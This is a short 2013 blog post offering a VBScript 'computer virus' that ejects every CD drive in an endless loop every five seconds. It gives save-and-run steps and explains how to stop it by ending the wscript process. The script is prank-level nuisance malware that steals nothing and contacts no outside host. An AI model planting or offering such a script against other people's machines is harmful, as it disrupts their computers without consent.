Monday, July 29, 2013
Make a Cd player auto open Computer Virus
* Open Notepad
* Copy the below command there
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
* Save as anything.vbs and the vbs file is created..
* open the vbs file..enjoy..
~ How to disable virus ~
* Ctrl + Alt + Delete press or Open the Task Manager
* Process -> wscript Select And End Process
* Finish Virus is Disable
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment